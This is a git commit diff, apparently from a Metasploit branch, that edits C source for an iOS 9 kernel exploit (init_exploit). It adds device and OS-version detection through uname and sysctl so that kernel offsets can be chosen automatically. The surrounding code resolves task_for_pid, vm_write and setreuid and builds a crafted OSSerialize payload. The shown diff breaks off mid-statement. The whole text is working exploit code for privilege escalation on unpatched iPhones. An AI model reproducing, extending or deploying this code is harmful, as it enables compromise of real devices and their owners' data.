fix offset detection

GSoC/Meterpreter_Web_Console
Tim W 2018-10-16 16:32:26 +08:00
parent 2e91ec1495
commit 981b527692
1 changed files with 46 additions and 6 deletions

View File

@ -22,6 +22,8 @@
#include <netinet/in.h> #include <netinet/in.h>
#include <arpa/inet.h> #include <arpa/inet.h>
#include <sys/utsname.h>
#include <mach/mach.h> #include <mach/mach.h>
#include <IOKit/IOKitLib.h> #include <IOKit/IOKitLib.h>
@ -3614,9 +3616,8 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid); DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid);
DLSYM_FUNC(getuid, libsystem, uid_t); DLSYM_FUNC(getuid, libsystem, uid_t);
DLSYM_FUNC(posix_spawn, libsystem, int, pid_t *pid, const char *path, const posix_spawn_file_actions_t *file_actions, const posix_spawnattr_t *attrp, char *const argv[], char *const envp[]); DLSYM_FUNC(uname, libsystem, int, struct utsname *buf);
DLSYM_FUNC(system, libsystem, int, char*); DLSYM_FUNC(sysctl, libsystem, int, int *name, u_int namelen, void *oldp, size_t *oldlenp, void *newp, size_t newlen);
DLSYM_FUNC(waitpid, libsystem, pid_t, pid_t pid, int *status, int options);
DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t); DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t);
DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
@ -3630,8 +3631,48 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
DLSYM_FUNC(unlink, libsystem, int, const char* file); DLSYM_FUNC(unlink, libsystem, int, const char* file);
// Init // Init
/*// TODO fix*/ struct utsname systeminfo;
target_environment = info_to_target_environment("iPhone5,3", "9.3.2"); uname_func(&systeminfo);
debug_print("Found device: %s\n", systeminfo.machine);
char osname[32];
size_t s = sizeof(osname);
int cmd[2] = { CTL_KERN, KERN_OSVERSION };
if(sysctl_func(cmd, sizeof(cmd) / sizeof(*cmd), osname, &s, NULL, 0) != 0) {
debug_print("%s\n", "Could not detect device version");
return;
}
bool pre91 = false;
const char* osversion = 0;
debug_print("Found version: %s\n", osname);
if (osname[2] == 'A') {
osversion = "9.0.2";
pre91 = true;
} else if (osname[2] == 'B') {
osversion = "9.1";
} else if (osname[2] == 'C') {
osversion = "9.2";
} else if (osname[2] == 'D') {
osversion = "9.2.1";
} else if (osname[2] == 'E') {
osversion = "9.3";
} else if (osname[2] == 'F') {
osversion = "9.3.2";
} else if (osname[2] == 'G') {
osversion = "9.3.3";
} else {
debug_print("%s\n", "Unsupported version");
return;
}
debug_print("Guessed version for offsets: %s\n", osversion);
target_environment = info_to_target_environment(systeminfo.machine, osversion);
if (!target_environment) {
debug_print("%s\n", "Unsupported version");
return;
}
const char *lock_last_path_component = "/tmp/lock"; const char *lock_last_path_component = "/tmp/lock";
char *home = getenv_func("HOME"); char *home = getenv_func("HOME");
@ -3740,7 +3781,6 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature)); memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
bufpos = sizeof(kOSSerializeBinarySignature); bufpos = sizeof(kOSSerializeBinarySignature);
bool pre91 = false;
WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10); WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
if (pre91) if (pre91)